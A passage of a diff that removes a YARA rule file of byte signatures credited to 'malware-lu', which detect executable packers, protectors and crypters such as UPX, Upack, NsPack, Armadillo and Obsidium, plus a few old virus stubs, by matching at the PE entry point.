-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule StonesPEEncryptorv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 42 30 40 ?? FF 95 32 35 40 ?? B8 37 30 40 ?? 03 C5 2B 85 1B 34 40 ?? 89 85 27 34 40 ?? 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv029betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 29 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02BJFNT11bAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXScramblerRCv1x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECrypt15BitShapeSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 55 20 40 00 B9 7B 09 00 00 8D BD 9D 20 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv021BetaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 ?? ?? AD 8B F8 ?? ?? ?? ?? 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXFreakV01HMX0101
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnnamedScrambler20p0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 0A 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 1C 2F 40 00 E8 C8 F1 FF FF 33 C0 55 68 FB 33 40 00 64 FF 30 64 89 20 BA 0C 34 40 00 B8 E4 54 40 00 E8 EF FE FF FF 8B D8 85 DB 75 07 6A 00 E8 5A F2 FF FF BA E8 54 40 00 8B C3 8B 0D E4 54 40 00 E8 74 E2 FF FF C7 05 20 6B 40 00 09 00 00 00 BB 98 69 40 00 C7 45 EC E8 54 40 00 C7 45 E8 31 57 40 00 C7 45 E4 43 60 40 00 BE D3 6A 40 00 BF E0 6A 40 00 83 7B 04 00 75 0B 83 3B 00 0F 86 AA 03 00 00 EB 06 0F 8E A2 03 00 00 8B 03 8B D0 B8 0C 6B 40 00 E8 C1 EE FF FF B8 0C 6B 40 00 E8 6F EE FF FF 8B D0 8B 45 EC 8B 0B E8 0B E2 FF FF 6A 00 6A 1E 6A 00 6A 2C A1 0C 6B 40 00 E8 25 ED FF FF 8D 55 E0 E8 15 FE FF FF 8B 55 E0 B9 10 6B 40 00 A1 0C 6B 40 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule HACKSTOPv100
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FA BD ?? ?? FF E5 6A 49 48 0C ?? E4 ?? 3F 98 3F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeShield36wwwexeshieldcom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC E9 FB C8 4F 1B 22 7C B4 C8 0D BD 71 A9 C8 1F 5F B1 29 8F 11 73 8F 00 D1 88 87 A9 3F 4D 00 6C 3C BF C0 80 F7 AD 35 23 EB 84 82 6F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Pe123v200644
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B C0 EB 01 34 60 EB 01 2A 9C EB 02 EA C8 E8 0F 00 00 00 EB 03 3D 23 23 EB 01 4A EB 01 5B C3 8D 40 00 53 EB 01 6C EB 01 7E EB 01 8F E8 15 01 00 00 50 E8 67 04 00 00 EB 01 9A 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SDProtectorV11xRandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BobPackv100BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DBPEv210
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83 C4 04 9D EB 01 75 68 5F 20 40 ?? E8 B0 EF FF FF 72 03 73 01 75 BE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPackv31NorthStar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }
-	$a1 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule SVKProtectorV13XPavolCerven
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakePECrypt102FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02WATCOMCCEXEAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 00 00 00 00 90 90 90 90 57 41 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PENinja
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UpackV036Dwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 FF 76 08 FF 76 0C BE 1C 01 }
-	$a1 = { BE ?? ?? ?? ?? FF 36 E9 C3 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule yodasProtectorv101AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPX050070
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxVCLencrypted
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 01 B9 ?? ?? 81 34 ?? ?? 46 46 E2 F8 C3 }
-	$a1 = { 01 B9 ?? ?? 81 35 ?? ?? 47 47 E2 F8 C3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule VxXRCV1015
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 83 ?? ?? 53 51 1E 06 B4 99 CD 21 80 FC 21 ?? ?? ?? ?? ?? 33 C0 50 8C D8 48 8E C0 1F A1 ?? ?? 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackv118BasicDLLaPLibAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PellesC290300400DLLX86CRTLIB
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 BF 01 00 00 00 85 DB 75 10 83 3D ?? ?? ?? ?? 00 75 07 31 C0 E9 ?? ?? ?? ?? 83 FB 01 74 05 83 FB 02 75 ?? 85 FF 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnnamedScrambler13Bp0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 98 56 00 10 E8 48 EB FF FF 33 C0 55 68 AC 5D 00 10 64 FF 30 64 89 20 6A 00 68 BC 5D 00 10 68 C4 5D 00 10 6A 00 E8 23 EC FF FF E8 C6 CE FF FF 6A 00 68 BC 5D 00 10 68 ?? ?? ?? ?? 6A 00 E8 0B EC FF FF E8 F2 F4 FF FF B8 08 BC 00 10 33 C9 BA 04 01 00 00 E8 C1 D2 FF FF 6A 00 68 BC 5D 00 10 68 E4 5D 00 10 6A 00 E8 E2 EB FF FF 68 04 01 00 00 68 08 BC 00 10 6A 00 FF 15 68 77 00 10 6A 00 68 BC 5D 00 10 68 FC 5D 00 10 6A 00 E8 BD EB FF FF BA 10 5E 00 10 B8 70 77 00 10 E8 CA F3 FF FF 85 C0 0F 84 F7 05 00 00 BA 74 77 00 10 8B 0D 70 77 00 10 E8 FE CD FF FF 6A 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HyingsPEArmor075exeHyingCCG
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? 00 00 00 00 00 00 ?? ?? 01 00 00 00 00 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 74 ?? ?? ?? 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule SimbiOZPolyCryptorvxxExtranger
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AVPACKv120
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 1E 0E 1F 16 07 33 F6 8B FE B9 ?? ?? FC F3 A5 06 BB ?? ?? 53 CB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov220
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 10 12 41 00 68 F4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XPack167
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 8C D3 15 33 75 81 3E E8 0F 00 9A E8 F9 FF 9A 9C EB 01 9A 59 80 CD 01 51 9D EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NullsoftInstallSystemv1xx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC 2C 53 56 33 F6 57 56 89 75 DC 89 75 F4 BB A4 9E 40 00 FF 15 60 70 40 00 BF C0 B2 40 00 68 04 01 00 00 57 50 A3 AC B2 40 00 FF 15 4C 70 40 00 56 56 6A 03 56 6A 01 68 00 00 00 80 57 FF 15 9C 70 40 00 8B F8 83 FF FF 89 7D EC 0F 84 C3 00 00 00 }
-	$a1 = { 83 EC 0C 53 56 57 FF 15 20 71 40 00 05 E8 03 00 00 BE 60 FD 41 00 89 44 24 10 B3 20 FF 15 28 70 40 00 68 00 04 00 00 FF 15 28 71 40 00 50 56 FF 15 08 71 40 00 80 3D 60 FD 41 00 22 75 08 80 C3 02 BE 61 FD 41 00 8A 06 8B 3D F0 71 40 00 84 C0 74 0F 3A C3 74 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule BobSoftMiniDelphiBoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }
-	$a1 = { 55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8 }
-	$a2 = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule UltraProV10SafeNet
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A1 ?? ?? ?? ?? 85 C0 0F 85 3B 06 00 00 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv1242v1243
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 09 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePack121build0909Method2bagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4D 5A 90 EB 01 00 52 E9 8A 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Obsidium13037ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxPhoenix927
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 5E 81 C6 ?? ?? BF 00 01 B9 04 00 F3 A4 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petite14c199899IanLuck
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorV10CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 35 14 00 00 E9 31 13 00 00 E9 98 12 00 00 E9 EF 0C 00 00 E9 42 13 00 00 E9 E9 02 00 00 E9 EF 0B 00 00 E9 1B 0D 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RECryptv07xCruddRETh2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B 17 33 55 58 89 17 83 C7 04 83 C1 FC EB EC 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PassEXEv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 1E 0E 0E 07 1F BE ?? ?? B9 ?? ?? 87 14 81 ?? ?? ?? EB ?? C7 ?? ?? ?? 84 00 87 ?? ?? ?? FB 1F 58 4A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RECryptv07xCruddRETh1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 61 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WIBUKeyV410Ahttpwibucomus
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F7 05 ?? ?? ?? ?? FF 00 00 00 75 12 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Mew501NorthFoxHCC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01ExeSmasherAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnnamedScrambler12C12Dp0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 05 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? 3A ?? ?? E8 ?? EC FF FF 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? D7 FF FF E8 ?? ?? FF FF B8 20 ?? ?? ?? 33 C9 BA 04 01 00 00 E8 ?? DB FF FF 68 04 01 00 00 68 20 ?? ?? ?? 6A 00 FF 15 10 ?? ?? ?? BA ?? ?? ?? ?? B8 14 ?? ?? ?? E8 ?? ?? FF FF 85 C0 0F 84 ?? 04 00 00 BA 18 ?? ?? ?? 8B 0D 14 ?? ?? ?? E8 ?? ?? FF FF 8B 05 88 ?? ?? ?? 8B D0 B8 54 ?? ?? ?? E8 ?? E3 FF FF B8 54 ?? ?? ?? E8 ?? E2 FF FF 8B D0 B8 18 ?? ?? ?? 8B 0D 88 ?? ?? ?? E8 ?? D6 FF FF FF 35 34 ?? ?? ?? FF 35 30 ?? ?? ?? FF 35 3C ?? ?? ?? FF 35 38 ?? ?? ?? 8D 55 E8 A1 88 ?? ?? ?? E8 ?? F0 FF FF 8B 55 E8 B9 54 }
-
-condition:
-		$a0
-}
-	
-	
-rule AlexProtectorv04beta1byAlex
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 00 00 00 C7 83 C4 04 33 C9 E8 01 00 00 00 68 83 C4 04 E8 01 00 00 00 68 83 C4 04 B9 ?? 00 00 00 E8 01 00 00 00 68 83 C4 04 E8 00 00 00 00 E8 01 00 00 00 C7 83 C4 04 8B 2C 24 83 C4 04 E8 01 00 00 00 A9 83 C4 04 81 ED 3C 13 40 00 E8 01 00 00 00 68 }
-
-condition:
-		$a0
-}
-	
-	
-rule UG2002Cruncherv03b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FishPEShield101HellFish
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 AD FF FF FF 89 45 DC E8 C1 FE FF FF 8B 10 03 55 DC 89 55 E4 83 C0 04 8B 10 89 55 FC 83 C0 04 8B 10 89 55 F4 83 C0 04 8B 10 89 55 F8 83 C0 04 8B 10 89 55 F0 83 C0 04 8B 10 89 55 EC 83 C0 04 8B 00 89 45 E8 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B 46 C7 45 E0 00 00 00 00 83 7B 04 00 74 14 }
-	$a1 = { 60 E8 12 FE FF FF C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 28 88 00 00 40 ?? 4B 00 00 00 02 00 00 00 A0 00 00 18 01 00 00 40 ?? 4C 00 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 40 ?? 4E 00 00 00 00 00 00 00 C0 00 00 40 39 00 00 40 ?? 4E 00 00 00 08 00 00 00 00 01 00 C8 06 00 00 40 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01Neolite20Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 A6 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEIntrov10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 04 24 9C 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 45 40 ?? 80 BD 67 44 40 ?? ?? 0F 85 48 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidiumv1250ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
